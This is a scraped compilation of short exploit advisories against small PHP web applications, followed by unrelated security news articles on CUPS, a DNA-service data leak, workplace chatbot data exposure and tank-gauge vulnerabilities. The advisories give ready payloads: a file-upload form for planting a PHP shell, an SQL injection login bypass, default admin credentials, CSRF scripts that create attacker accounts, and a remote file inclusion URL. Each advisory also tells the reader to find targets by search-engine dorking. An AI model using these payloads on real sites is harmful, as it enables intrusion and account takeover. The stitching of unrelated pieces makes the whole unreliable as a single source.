Student Enrollment version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Student Enrollment v1.0 Remote File Upload Vulnerability                                                                    |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/06/Student_Enrollment_In_PHP_With_Source_Code.zip                             |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] use payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Upload Profile Photo</title>  
</head>  
<body>  
    <h2>Upload Profile Photo</h2>  
    <form action="http://127.0.0.1/student-php-enroolment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">  
        <label for="userphoto">Select Photo:</label>  
        <input type="file" id="userphoto" name="userphoto" required><br><br>

        <button type="submit" name="upphoto">Upload Photo</button>  
    </form>  
</body>  
</html>

[+] Go to the line 10. Set the target site link Save changes and apply . 

[+] save code as poc.html 

[+] Link to the uploaded files : admin/index.php?page=user-profile

[+] path : http://127.0.0.1/student-php-enroolment/admin/images/ evli.php

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Student Enrollment 1.0 Arbitrary File Upload

Sistem Penyewaan Baju atau Pakaian Berbasis Web version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Sistem Penyewaan Baju atau Pakaian Berbasis Web v1.0 Auth By Pass Vulnerability                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://shopee.co.id/Aplikasi-Sistem-Penyewaan-Baju-atau-Pakaian-Berbasis-Web-i.95672618.9716246272                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/batarisalononline/admin/dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Sistem Penyewaan Baju atau Pakaian Berbasis Web 1.0 SQL Injection

Simple Student Quarterly Result / Grade System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Simple Student Quarterly Result / Grade System v1.0 Insecure Settings Vulnerability                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Simple Student Quarterly Result / Grade System 1.0 Insecure Settings

Simple Responsive Tourism Website version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Simple Responsive Tourism Website v1.0 CSRF Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following JavaScript code :

   creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:

[+] Create an XMLHttpRequest object:

    xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.

[+] Open the request:

    xhr.open("POST", "http://127.0.0.1/tourism/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST".

[+] Set the request headers:

    xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.  
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.  
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with specified boundaries.

[+] Enable sending cookies:

    xhr.withCredentials = true; Specifies that cookies should be sent with the request.

[+] Setting up the request data:

    The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.

    This string is converted to a Uint8Array and then to a Blob to be sent.

[+] Sending the request:

    xhr.send(new Blob([aBody])); Sends the data to the server.

[+] User Interface:  
    There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.

[+] Go to the line 6. Set the target site link Save changes and apply . 

[+] infected file : Users.php.

[+] Line 15 : Choose a name "indoushka".

[+] Line 19 : Choose a pass "Hacked".

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>   
<html>   
<body>  
 <script> function submitRequest()   
 { var xhr = new XMLHttpRequest();   
 xhr.open("POST", "http:\/\/127.0.0.1\/php-ycrs\/tourism\/Users.php?f=save", true);   
 xhr.setRequestHeader("Accept", "*\/*");   
 xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
 xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
 xhr.withCredentials = true;   
 var body =  
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"username\"\r\n" +   
 "\r\n" +   
 "indoushka\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"password\"\r\n" +   
 "\r\n" +   
 "Hacked\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"type\"\r\n" +   
 "\r\n" +   
 "1\r\n" +   
 "-------------------------------\r\n";   
 var aBody = new Uint8Array(body.length);   
 for (var i = 0; i < aBody.length; i++)   
 aBody[i] = body.charCodeAt(i);   
 xhr.send(new Blob([aBody]));   
 }  
 </script>  
 <form action="#">  
 <input type="button" value="Submit request" onclick="submitRequest();" />  
 </form>   
 </body>   
 </html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Simple Responsive Tourism Website 1.0 Cross Site Request Forgery

Simple Music Management System version 1.0 suffers from add administrator and cross site request forgery vulnerabilities.

=============================================================================================================================================  
| # Title     : Simple Music Management System v1.0 CSRF Add ADmin Vulnerability                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/12978/music-management-system-in-php-php-project-source-code                          |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code add new admin .

[+] Go to the line 35.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">User Name:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <div class="form-group">  
      <label for="" class="control-label">Avatar</label>  
      <div class="custom-file">  
              <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
              <label class="custom-file-label" for="customFile">Choose file</label>  
            </div>  
    </div>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/music/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Simple Music Management System 1.0 Add Administrator / Cross Site Request Forgery

Sample Blog Site version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

**Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion**

**Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion**

Posted Sep 30, 2024

Authored by indoushka

Sample Blog Site version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, xss, file inclusion

SHA-256 | 9eb4f98f6b5aa7c6a2b152f6a928201fce3e01efc03aed42ffeb58be9416ad69

Download | Favorite | View

**Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion**

    =============================================================================================================================================| # Title     : Sample Blog Site 1.0 XSS Vulnerability                                                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-simple-ims.zip                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /blog/index.php?id=2&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg[+] http://127.0.0.1/blog/index.php?id=2&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpgGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion

Hold onto your hats, folks, because the cybersecurity world is anything but quiet! Last week, we dodged a bullet when we discovered vulnerabilities in CUPS that could've opened the door to remote attacks. Google's switch to Rust is paying off big time, slashing memory-related vulnerabilities in Android.
But it wasn't all good news – Kaspersky's forced exit from the US market left users with more

Cybersecurity / Weekly Recap

Hold onto your hats, folks, because the cybersecurity world is anything but quiet! Last week, we dodged a bullet when we discovered vulnerabilities in CUPS that could've opened the door to remote attacks. Google's switch to Rust is paying off big time, slashing memory-related vulnerabilities in Android.

But it wasn't all good news – Kaspersky's forced exit from the US market left users with more questions than answers. And don't even get us started on the Kia cars that could've been hijacked with just a license plate!

Let's unpack these stories and more, and arm ourselves with the knowledge to stay safe in this ever-evolving digital landscape.

****⚡ Threat of the Week****

**Flaws Found in CUPS:** A new set of security vulnerabilities has been disclosed in the OpenPrinting Common Unix Printing System (CUPS) on Linux systems that could permit remote command execution under certain conditions. Red Hat Enterprise Linux tagged the issues as Important in severity, given that the real-world impact is likely to be low due to the prerequisites necessary to pull off a successful exploit.

****🔔 Top News****

*   **Google's Touts Shift to Rust:** The pivot to memory-safe languages such as Rust for Android has led to the percentage of memory-safe vulnerabilities discovered in Android dropping from 76% to 24% over a period of six years. The development comes as Google and Arm's increased collaboration has made it possible to flag multiple shortcomings and elevate the overall security of the GPU software/firmware stack across the Android ecosystem.
*   **Kaspersky Exits U.S. Market:** Russian cybersecurity vendor Kaspersky, which has been banned from selling its products in the U.S. due to national security concerns, raised concerns after some found that their installations have been automatically removed and replaced by antivirus software from a lesser-known company called UltraAV. Kaspersky said it began notifying customers of the transition earlier this month, but it appears that it was not made clear that the software would be forcefully migrated without requiring any user action. Pango, which owns UltraUV, said users also had the option of canceling their subscription directly with Kaspersky's customer service team.
*   **Kia Cars Could Be Remotely Controlled with Just License Plates:** A set of now patched vulnerabilities in Kia vehicles that could have allowed remote control over key functions simply by using only a license plate. They could also let attackers covertly gain access to sensitive information including the victim's name, phone number, email address, and physical address. There is no evidence that these vulnerabilities were ever exploited in the wild.
*   **U.S. Sanctions Cryptex and PM2BTC:** The U.S. government sanctioned two cryptocurrency exchanges Cryptex and PM2BTC for allegedly facilitating the laundering of cryptocurrencies possibly obtained through cybercrime. In tandem, an indictment was unsealed against a Russian national, Sergey Sergeevich Ivanov, for his purported involvement in the operation of several money laundering services that were offered to cybercriminals.
*   **3 Iranian Hackers Charged:** In yet another law enforcement action, the U.S. government charged three Iranian nationals, Masoud Jalili, Seyyed Ali Aghamiri, and Yasar (Yaser) Balaghi, who are allegedly employed with the Islamic Revolutionary Guard Corps (IRGC) for their targeting of current and former officials to steal sensitive data in an attempt to interfere with the upcoming elections. Iran has called the allegations baseless.

****📰 Around the Cyber World****

*   **Mysterious Internet Noise Storms Detailed:** Threat intelligence firm GreyNoise said it has been tracking large waves of "Noise Storms" containing spoofed internet traffic comprising TCP connections and ICMP packets since January 2020, although the exact origins and its intended purpose remain unknown. An intriguing aspect of the inexplicable phenomenon is the presence of a "LOVE" ASCII string in the generated ICMP packets, reinforcing the hypothesis that it could be used as a covert communications channel. "Millions of spoofed IPs are flooding key internet providers like Cogent and Lumen while strategically avoiding AWS — suggesting a sophisticated, potentially organized actor with a clear agenda," it said. "Although traffic appears to originate from Brazil, deeper connections to Chinese platforms like QQ, WeChat, and WePay raise the possibility of deliberate obfuscation, complicating efforts to trace the true source and purpose."
*   **Tails and Tor Merge Operations:** The Tor Project, the non-profit that maintains software for the Tor (The Onion Router) anonymity network, is joining forces with Tails (short for The Amnesic Incognito Live System), the maker of a portable Linux-based operating system that uses Tor. "Incorporating Tails into the Tor Project's structure allows for easier collaboration, better sustainability, reduced overhead, and expanded training and outreach programs to counter a larger number of digital threats," the organizations said. The move "feels like coming home," intrigeri, Tails OS team lead said.
*   **NIST Proposes New Password Rules:** The U.S. National Institute of Standards and Technology (NIST) has outlined new guidelines that suggest credential service providers (CSPs) stop recommending passwords using several character types and stop mandating periodic password changes unless the authenticator has been compromised. Other notable recommendations include passwords should be anywhere between 15 and 64 characters long, as well as ASCII and Unicode characters should be allowed when setting them.
*   **PKfail More Broader Than Previously Thought:** A critical firmware supply chain issue known as PKfail (CVE-2024-8105), which allows attackers to bypass Secure Boot and install malware, has been now found to impact more devices, including medical devices, desktops, laptops, gaming consoles, enterprise servers, ATMs, PoS terminals, and even voting machines. Binarly has described PKfail as a "great example of a supply chain security failure impacting the entire industry."
*   **Microsoft Revamps Recall:** When Microsoft released its AI-powered feature Recall in May 2024, it was met with near instantaneous backlash over privacy and security concerns, and for making it easier for threat actors to steal sensitive data. The company subsequently delayed a wider rollout pending under-the-hood changes to ensure that the issues were addressed. As part of the new updates, Recall is no longer enabled by default and can be uninstalled by users. It also moves all of the screenshot processing to a Virtualization-based Security (VBS) Enclave. Furthermore, the company said it engaged an unnamed third-party security vendor to perform an independent security design review and penetration test.

**🔥 **Cybersecurity Resources & Insights****

*   **Upcoming Webinars**
    *   **Overloaded with Logs? Let's Fix Your SIEM:** Legacy SIEMs are overwhelmed. The answer isn't more data... It's better oversight. Join Zuri Cortez and Seth Geftic as they break down how we went from data overload to security simplicity without sacrificing performance. Save your seat today and simplify your security game with our Managed SIEM.
    *   **Strategies to Defeat Ransomware in 2024**: Ransomware attacks are up by 17.8%, and ransom payouts are reaching all-time highs. Is your organization prepared for the escalating ransomware threat? Join us for an exclusive webinar where Emily Laufer, Director of Product Marketing at Zscaler, will unveil insights from the Zscaler ThreatLabz 2024 Ransomware Report. Register now and secure your spot!
*   **Ask the Expert**
    *   **Q:** How can organizations secure device firmware against vulnerabilities like PKfail, and what technologies or practices should they prioritize?
    *   **A:** Securing firmware isn't just about patching—it's about protecting the very core of your devices where threats like PKfail hide in plain sight. Think of firmware as the foundation of a skyscraper; if it's weak, the entire structure is at risk. Organizations should prioritize implementing secure boot mechanisms to ensure only trusted firmware loads, use firmware vulnerability scanning tools to detect and address issues proactively, and deploy runtime protections to monitor for malicious activities. Partnering closely with hardware vendors for timely updates, adopting a zero-trust security model, and educating employees about firmware risks are also crucial. In today's cyber landscape, safeguarding the firmware layer is essential—it's the bedrock of your entire security strategy.

****🔒 Tip of the Week****

**Prevent Data Leaks to AI Services:** Protect sensitive data by enforcing strict policies against sharing with external AI platforms, deploying DLP tools to block confidential transmissions, restricting access to unauthorized AI tools, training employees on the risks, and using secure, in-house AI solutions.

****Conclusion****

Until next time, remember, cybersecurity is not a sprint, it's a marathon. Stay vigilant, stay informed, and most importantly, stay safe in this ever-evolving digital world. Together, we can build a more secure online future.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Last Week's Top Threats and Trends (September 23-29)

ChiceDNA exposed 8,000 sensitive records, including biometric images, personal details, and facial DNA data in an unsecured WordPress…

ChiceDNA exposed 8,000 sensitive records, including biometric images, personal details, and facial DNA data in an unsecured WordPress folder. Privacy concerns highlight the need for stronger data protection.

An Indiana-based genetic DNA testing and facial matching service provider exposed thousands of customers’ personal, biometric, and PII data. This incident was reported to Hackread.com by cybersecurity researcher Jeremiah Fowler, known for identifying and reporting misconfigured databases to companies before malicious actors exploit them.

The problematic aspect of this incident is that there was no misconfigured database or a compromised cloud server this time. It was just an unsecure WordPress folder hosting a treasure trove of sensitive data left for public access without any password or security authentication.

The exposed data comprised around 8,000 documents. It included biometric images, names, phone numbers, email addresses, racial or ethnic identities, and personal notes detailing reasons for seeking facial DNA analysis. The exposed information also includes records of vulnerable individuals, including newborn children.

These records were stored in a non-secure WordPress folder titled “Facial Recognition Uploads,” accessible to anyone with a web browser. The exposure lasted for an unknown duration, raising concerns about the potential misuse of this sensitive information.

In his report for vpnMentor shared with Hackread.com ahead of publishing, Fowler explained that Biometric data, such as facial recognition information, is highly sensitive and can be used to identify individuals, track their movements, and even manipulate their identities through deepfakes. Collecting, storing, and analyzing such data without explicit consent is a serious violation of individual privacy.

Metadata, the information that describes, organizes, and manages data, can also pose significant risks. In this case, the exposed metadata included personally identifiable information (PII) such as names, emails, and phone numbers. This information could be exploited for phishing, social engineering, or blackmail attempts.

For your information, ChoiceDNA is an Indiana-based company that offers DNA testing and facial recognition service called FACE IT DNA It uses facial comparison technology to analyze images to determine the likelihood of a genetic link between family members. The BASIC package is $38, while the PRO package is $63. 

Fowler sent the company a responsible disclosure notice after which the database was promptly secured. Still, such incidents show the importance of secure data storage practices. WordPress, while a popular content management system, can be vulnerable if not configured correctly. The exposed data in this case was stored in a non-secure WordPress folder, highlighting the need for robust security measures to protect sensitive information.

Companies and users/customers with known data exposure should immediately change passwords and avoid reusing the same passwords for multiple accounts. Create strong, unique passwords for each account and enable two-factor authentication (2FA) as an additional layer of security.

Be cautious when exposing emails and phone numbers, as potential phishing attempts or suspicious requests for additional information can occur. Verify requests for sensitive information, such as banking or credit card information, to ensure the person on the other end and the request are legitimate.

1.  Data of 7 Million 23andMe Users from DNA Service Hacked
2.  Researchers Encode Physical DNA with Malware to Infect PC
3.  DNA testing website MyHeritage hacked; 92M user accounts stolen

Facial DNA provider leaks biometric data via WordPress folder

Productivity has a downside: A shocking number of employees share sensitive or proprietary data with the generational AI platforms they use, without letting their bosses know.

Source: Marcos Alvarado via Alamy Stock Photo

Generational AI chatbots are popping up in everything from email clients to HR tools these days, offering a friendly and smooth path toward better enterprise productivity. But there's a problem: All too often, workers aren't thinking about the data security of the prompts they're using to elicit chatbot responses.

In fact, more than a third (38%) of employees share sensitive work information with AI tools without their employer's permission, according to a survey this week by the US National Cybersecurity Alliance (NCA). And that's a problem.

The NCA survey (which polled 7,000 people globally) found that Gen Z and millennial workers are more likely to share sensitive work information without getting permission: A full 46% and 43%, respectively, admitted to the practice, as opposed to 26% and 14% of Gen X and baby boomers, respectively.

**Real-World Consequences From Sharing Data With Chatbots**

The issue is that most of the most prevalent chatbots capture whatever information users put into prompts, which could be things like proprietary earnings data, top-secret design plans, sensitive emails, customer data, and more — and send it back to the large language models (LLMs), where it's used to train the next generation of GenAI.

And that means that someone could later access that data using the right prompts, because it's part of the retrievable data lake now. Or, perhaps the data is kept for internal LLM use, but its storage isn't set up properly. The dangers of this — as Samsung found out in one high-profile incident — are relatively well understood by security pros — but by everyday workers, not so much.

ChatGPT’s creator, OpenAI, warns in its user guide, "We are not able to delete specific prompts from your history. Please don't share any sensitive information in your conversations." But it's hard for the average worker to constantly be thinking about data exposure. Lisa Plaggemier, executive director of NCA, notes one case that illustrates how the risk can easily translate into real-world attacks.

"A financial services firm integrated a GenAI chatbot to assist with customer inquiries," Plaggemier tells Dark Reading. "Employees inadvertently input client financial information for context, which the chatbot then stored in an unsecured manner. This not only led to a significant data breach, but also enabled attackers to access sensitive client information, demonstrating how easily confidential data can be compromised through the improper use of these tools."

Galit Lubetzky Sharon, CEO at Wing, offers another real-life example (without naming names).

"An employee, for whom English was a second language, at a multinational company, took an assignment working in the US," she says. "In order to improve his written communications with his US based colleagues, he innocently started using Grammarly to improve his written communications. Not knowing that the application was allowed to train on the employee's data, the employee sometimes used Grammarly to improve communications around confidential and proprietary data. There was no malicious intent, but this scenario highlights the hidden risks of AI."

**A Lack of Training & the Rise of "Shadow AI"**

One reason for the high percentages of people willing to roll the dice is almost certainly a lack of training. While the Samsungs of the world might swoop into action on locking down AI use, the NCA survey found that 52% of employed participants have not yet received any training on safe AI use, while just 45% of the respondents who actively use AI have.

"This statistic suggests that many organizations may underestimate the importance of training, perhaps due to budget constraints, or a lack of understanding about the potential risks," Plaggemier says. And meanwhile, she adds, "This data underscores the gap between recognizing potential dangers and having the knowledge to mitigate them. Employees may understand that risks exist, but the lack of proper education leaves them vulnerable to the severity of these threats, especially in environments where productivity often takes precedence over security."

Worse, this knowledge gap contributes to the rise of "shadow AI," where unapproved tools are used outside the organization's security framework.

"As employees prioritize efficiency, they may adopt these tools without fully grasping the long-term consequences for data security and compliance, leaving organizations vulnerable to significant risks," Plaggemier warns.

**It's Time for Enterprises to Implement GenAI Best Practices**

It's clear that prioritizing immediate business needs over long-term security strategies can leave companies vulnerable. But when it comes to rolling out AI before security is ready, the golden allure of all those productivity enhancements — sanctioned or not — may often prove too strong to resist.

"As AI systems become more common, it's essential for organizations to view training not just as a compliance requirement but as a vital investment in protecting their data and brand integrity," Plaggemier says. "To effectively reduce risk exposure, companies should implement clear guidelines around the use of GenAI tools, including what types of information can and cannot be shared."

Morgan Wright, chief security adviser at SentinelOne, advocates starting the guidelines-development process with first principles: "The biggest risk is not defining what problem you're solving through chatbots," he notes. "Understanding what is to be solved helps create the right policies and operational guardrails to protect privacy and intellectual property. It's emblematic of the old saying, 'When all you have is a hammer, all the world is a nail.'"

There are also technology steps that organizations should take to shore up AI risks.

"Establishing strict access controls and monitoring the use of these tools can also help mitigate risks," Plaggemier adds. "Implementing data masking techniques can protect sensitive information from being input into GenAI platforms. Regular audits and the use of AI monitoring tools can also ensure compliance and detect any unauthorized attempts to access sensitive data."

There are other ideas out there, too. "Some companies have restricted the amount of data input into a query (like 1,024 characters)," Wright says. "It could also involve segmenting off parts of the organization dealing with sensitive data. But for now, there is no clear solution or approach that can solve this thorny issue to everyone's satisfaction."

The danger to companies can also be exacerbated thanks to GenAI capabilities being added to third-party software-as-a-solution (SaaS) applications, Wing's Sharon warns — this is an area that is too often overlooked.

"As new capabilities are added, even to very reputable SaaS applications, the terms and conditions of those applications is often updated, and 99% of users don't pay attention to those terms," she explains. "It is not unusual for applications to set as the default that they can use data to train their AI models."

She notes that an emerging category of SaaS security tools called SaaS Security Posture Management (SSPM) is developing ways to monitor which applications use AI and even monitor changes to things like terms and conditions.

"Tools like this are helpful for IT teams to assess risks and make changes in policy or even access on a continuous basis," she says.

**About the Author**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

Shadow AI, Data Exposure Plague Workplace Chatbot Use

Critical security vulnerabilities have been disclosed in six different Automatic Tank Gauge (ATG) systems from five manufacturers that could expose them to remote attacks.
"These vulnerabilities pose significant real-world risks, as they could be exploited by malicious actors to cause widespread damage, including physical damage, environmental hazards, and economic losses," Bitsight researcher

Critical security vulnerabilities have been disclosed in six different Automatic Tank Gauge (ATG) systems from five manufacturers that could expose them to remote attacks.

"These vulnerabilities pose significant real-world risks, as they could be exploited by malicious actors to cause widespread damage, including physical damage, environmental hazards, and economic losses," Bitsight researcher Pedro Umbelino said in a report published last week.

Making matters worse, the analysis found that thousands of ATGs are exposed to the internet, making them a lucrative target for malicious actors looking to stage disruptive and destructive attacks against gas stations, hospitals, airports, military bases, and other critical infrastructure facilities.

ATGs are sensor systems designed to monitor the level of a storage tank (e.g., fuel tank) over a period of time with the goal of determining leakage and parameters. Exploitation of security flaws in such systems could therefore have serious consequences, including denial-of-service (DoS) and physical damage.

The newly discovered 11 vulnerabilities affect six ATG models, namely Maglink LX, Maglink LX4, OPW SiteSentinel, Proteus OEL8000, Alisonic Sibylla, and Franklin TS-550. Eight of the 11 flaws are rated critical in severity -

*   CVE-2024-45066 (CVSS score: 10.0) - OS command injection in Maglink LX
*   CVE-2024-43693 (CVSS score: 10.0) - OS command injection in Maglink LX
*   CVE-2024-43423 (CVSS score: 9.8) - Hard-coded credentials in Maglink LX4
*   CVE-2024-8310 (CVSS score: 9.8) - Authentication bypass in OPW SiteSentinel
*   CVE-2024-6981 (CVSS score: 9.8) - Authentication bypass in Proteus OEL8000
*   CVE-2024-43692 (CVSS score: 9.8) - Authentication bypass in Maglink LX
*   CVE-2024-8630 (CVSS score: 9.4) - SQL injection in Alisonic Sibylla
*   CVE-2023-41256 (CVSS score: 9.1) - Authentication bypass in Maglink LX (a duplicate of a previously disclosed flaw)
*   CVE-2024-41725 (CVSS score: 8.8) - Cross-site scripting (XSS) in Maglink LX
*   CVE-2024-45373 (CVSS score: 8.8) - Privilege escalation in Maglink LX4
*   CVE-2024-8497 (CVSS score: 7.5) - Arbitrary file read in Franklin TS-550

"All these vulnerabilities allow for full administrator privileges of the device application and, some of them, full operating system access," Umbelino said. "The most damaging attack is making the devices run in a way that might cause physical damage to their components or components connected to it."

**Flaws Discovered in OpenPLC, Riello NetMan 204, and AJCloud**

Security flaws have also been uncovered in the open-source OpenPLC solution, including a critical stack-based buffer overflow bug (CVE-2024-34026, CVSS score: 9.0) that could be exploited to achieve remote code execution.

"By sending an ENIP request with an unsupported command code, a valid encapsulation header, and at least 500 total bytes, it is possible to write past the boundary of the allocated log\_msg buffer and corrupt the stack," Cisco Talos said. "Depending on the security precautions enabled on the host in question, further exploitation could be possible."

Another set of security holes concern the Riello NetMan 204 network communications card used in its Uninterruptible Power Supply (UPS) systems that could enable malicious actors to take over control of the UPS and even tamper with the collected log data.

*   CVE-2024-8877 - SQL injection in three API endpoints /cgi-bin/db\_datalog\_w.cgi, /cgi-bin/db\_eventlog\_w.cgi, and /cgi-bin/db\_multimetr\_w.cgi that allows for arbitrary data modification
*   CVE-2024-8878 - Unauthenticated password reset via the endpoint /recoverpassword.html that could be abused to obtain the netmanid from the device, from which the recovery code for resetting the password can be calculated

"Inputting the recovery code in '/recoverpassword.html' resets the login credentials to admin:admin," CyberDanube's Thomas Weber said, noting that this could grant the attacker the ability to hijack the device and turn it off.

Both vulnerabilities remain unpatched, necessitating that users limit access to the devices in critical environments until a fix is made available.

Also of note are several critical vulnerabilities in the AJCloud IP camera management platform that, if successfully exploited, could lead to the exposure of sensitive user data and provide attackers with full remote control of any camera connected to the smart home cloud service.

"A built-in P2P command, which intentionally provides arbitrary write access to a key configuration file, can be leveraged to either permanently disable cameras or facilitate remote code execution through triggering a buffer overflow," Elastic Security Labs said, stating its efforts to reach the Chinese company have been unsuccessful to date.

**CISA Warns of Continued Attacks Against OT Networks**

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) flagged increased threats to internet-accessible operational technology (OT) and industrial control systems (ICS) devices, including those in the Water and Wastewater Systems (WWS) Sector.

"Exposed and vulnerable OT/ICS systems may allow cyber threat actors to use default credentials, conduct brute force attacks, or use other unsophisticated methods to access these devices and cause harm," CISA said.

Earlier this February, the U.S. government sanctioned six officials associated with the Iranian intelligence agency for attacking critical infrastructure entities in the U.S. and other countries.

These attacks involved targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs) that are publicly exposed to the internet through the use of default passwords.

Industrial cybersecurity company Claroty has since open-sourced two tools called PCOM2TCP and PCOMClient that allow users to extract forensics information from Unitronics-integrated HMIs/PLCs.

"PCOM2TCP, enables users to convert serial PCOM messages into TCP PCOM messages and vice versa," it said. "The second tool, called PCOMClient, enables users to connect to their Unitronics Vision/Samba series PLC, query it, and extract forensic information from the PLC."

Furthermore, Claroty has warned that the excessive deployment of remote access solutions within OT environments – anywhere between four and 16 – creates new security and operational risks for organizations.

"55% of organizations deployed four or more remote access tools that connect OT to the outside world, a worrisome percentage of companies that have expansive attack surfaces that are complex and expensive to manage," it noted.

"Engineers and asset managers should actively pursue to eliminate or minimize the use of low-security remote access tools in the OT environment, especially those with known vulnerabilities or those lacking essential security features such as MFA."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#auth